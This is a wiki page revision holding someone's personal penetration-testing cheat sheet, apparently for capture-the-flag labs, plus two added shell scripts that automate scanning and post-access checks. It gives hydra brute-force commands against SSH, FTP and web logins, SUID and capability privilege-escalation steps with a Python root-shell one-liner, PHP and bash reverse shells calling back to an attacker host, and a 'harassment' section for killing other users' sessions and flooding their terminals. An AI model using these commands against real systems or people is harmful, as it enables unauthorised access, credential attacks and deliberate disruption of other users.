Difference between revisions of "Enumeration"
Revision as of 21:47, 11 November 2020
NMAP the IP address, and perform a service scan.
GOBUSTER every web service found (each IP address and HTTP port).
HASH-IDENTIFIER any hashes found.
!! IF ACCESS GAINED !!
CHECK /etc/passwd
CHECK /etc/crontab
*** STEGANOGRAPHY ***
steghide extract -sf <filename>     (prompts for a passphrase; try an empty one first)
stegcracker <filename> <wordlist>
ffuf -w /usr/share/wordlists/common.txt -u http://0.0.0.0/FUZZ -t 120
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.210.9/hidden
nmap -sS -A 10.10.210.9
hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/passlist.txt 10.10.210.9 ssh
hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.210.9
hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/passlist.txt 10.10.210.9 http-post-form "/api/user/login:username=^USER^&password=^PASS^:F=incorrect" -V
(F=incorrect must be a string that appears only in the failed-login response; confirm it with one manual bad login first, otherwise every attempt is reported as a hit)
Run linpeas once you have a shell on a Linux machine.
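Added example (mine, not part of these notes): a small sh script that links the NMAP and GOBUSTER steps above. It assumes the nmap scan was saved in grepable form with -oG and that gobuster is on the PATH; the scan output used to exercise it is constructed. web_targets prints one URL per open HTTP(S) port, and bust_all runs the same gobuster dir command as above against each of them.

```shell
#!/bin/sh
# Added example, not part of the original notes: feed every open web port
# from an nmap grepable scan (nmap -sS -sV -oG scan.gnmap <ip>) into gobuster.
# Usage:  sh web_targets.sh --list < scan.gnmap   (print the URLs)
#         sh web_targets.sh --bust < scan.gnmap   (run gobuster on each)

# Print scheme://host:port for every open port whose nmap service name is HTTP-like.
# In -oG output each port is "port/state/proto/owner/service/rpc/version";
# nmap writes the service "ssl/http" as "ssl|http" there.
web_targets() {
    awk '
        /Ports:/ {
            host = $2
            sub(/.*Ports: /, "")
            n = split($0, ports, /, /)
            for (i = 1; i <= n; i++) {
                split(ports[i], f, "/")
                if (f[2] != "open") { continue }
                svc = f[5]
                if (svc == "http" || svc == "http-alt" || svc == "http-proxy") {
                    scheme = "http"
                } else if (svc == "https" || svc == "ssl|http" || svc == "https-alt") {
                    scheme = "https"
                } else {
                    continue
                }
                printf "%s://%s:%s\n", scheme, host, f[1]
            }
        }'
}

# Run the gobuster dir scan from the notes against each URL, one output file per target.
bust_all() {
    web_targets | while read -r url; do
        out="$(printf '%s' "$url" | tr ':/' '__').txt"
        gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
            -u "$url" -o "$out"
    done
}

case "${1:-}" in
    --list) web_targets ;;
    --bust) bust_all ;;
esac
```

Filtered or closed ports are skipped, so a box with only SSH open produces no targets and gobuster is never started.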
***
ALWAYS TRY TO RUN 'sudo -l'
For every user: find / -type f -perm -u=s 2>/dev/null; getcap -r / 2>/dev/null
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'   (works when getcap shows cap_setuid on python3, or python3 is SUID root)
****
***
ALWAYS 'sudo -l' IF YOU GAIN ACCESS
SEE IF A "NOPASSWD" ENTRY COVERS /BIN/BASH or /BIN/SH (OR ANY BINARY THAT CAN SPAWN ONE) FOR ESCALATION
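Added example (mine, not part of these notes) covering the IF ACCESS GAINED checks and the sudo -l / SUID / getcap steps above in one script. The parsing helpers read from stdin so they can be tried on saved copies of /etc/passwd, /etc/crontab and sudo -l output; the samples used to exercise them are constructed. The --live mode runs the same commands as the notes on the current box.

```shell
#!/bin/sh
# Added example, not part of the original notes: post-access triage for the
# checks above (/etc/passwd, /etc/crontab, sudo -l, SUID binaries, capabilities).
# Usage:  sh triage.sh --live                 (run on the box you just landed on)
#         . ./triage.sh; login_accounts < saved_passwd   (work on saved copies)

# Accounts that can actually log in (shell is not nologin/false). Any account other
# than root with UID 0 is flagged: a second UID-0 user is a classic planted backdoor.
login_accounts() {
    awk -F: '
        NF >= 7 && $7 !~ /(nologin|false)$/ {
            tag = ($3 == 0 && $1 != "root") ? " [UID 0, not root]" : ""
            printf "%s uid=%s shell=%s%s\n", $1, $3, $7, tag
        }'
}

# Commands that root runs from /etc/crontab-style input (fields: m h dom mon dow user cmd,
# or @reboot/@hourly user cmd). A writable script or directory here is the escalation.
root_cron_commands() {
    awk '
        !/^[[:space:]]*(#|$)/ {
            if ($1 ~ /^@/) { u = 2 } else if (NF >= 7) { u = 6 } else { next }
            if ($u != "root") { next }
            cmd = $(u + 1)
            for (i = u + 2; i <= NF; i++) { cmd = cmd " " $i }
            print cmd
        }'
}

# NOPASSWD lines from sudo -l output, leading whitespace stripped.
nopasswd_entries() {
    grep 'NOPASSWD' | sed 's/^[[:space:]]*//'
}

# The live checks, exactly the commands from the notes above, wrapped in one call.
live_triage() {
    echo "== login accounts ==";      login_accounts < /etc/passwd
    echo "== root cron commands ==";  root_cron_commands < /etc/crontab
    echo "== sudo -l (NOPASSWD) ==";  sudo -n -l 2>/dev/null | nopasswd_entries
    echo "== SUID binaries ==";       find / -type f -perm -u=s 2>/dev/null
    echo "== file capabilities ==";   getcap -r / 2>/dev/null
}

case "${1:-}" in
    --live) live_triage ;;
esac
```

sudo -n never prompts, so the script does not hang on a box where the current user has no sudo entry at all; an empty NOPASSWD section simply means that route is closed and the SUID and capability lists are the next thing to read.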
***
***
REVERSE SHELLS
php -r '$sock=fsockopen("192.168.0.195",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
bash -i >& /dev/tcp/0.0.0.0/1234 0>&1
***
***
SHOW ALL OTHER CONNECTIONS
netstat -natp
***
** HARASSMENT **
There's probably an easier way, but I do this:
See who's logged into your machine -- use who or w:
> who
mmrozek tty1 Aug 17 10:03
mmrozek pts/3 Aug 17 10:09 (:pts/2:S.0)
Look up the process ID of the shell their TTY is connected to:
> ps t
PID TTY STAT TIME COMMAND
30737 pts/3 Ss 0:00 zsh
Laugh at their impending disconnection (this step is optional, but encouraged)
> echo "HAHAHAHAHAHAHAHA" | write mmrozek pts/3
Kill the corresponding process:
> kill -9 30737
HARASSMENT SCRIPT
#!/bin/bash
# spam the target terminal with blank lines until interrupted;
# take username and pts/N from the output of 'who'
while true
do
    echo '' | write username pts/N
done
*** ONE LINER REVERSE SHELLS ***
https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt
** SHOW LISTENING PORTS AND CONNECTED IPS ON MACHINE **
netstat -natlp
(kick them off with [kill -9 PID] after finding PID with [netstat -np | grep PORT])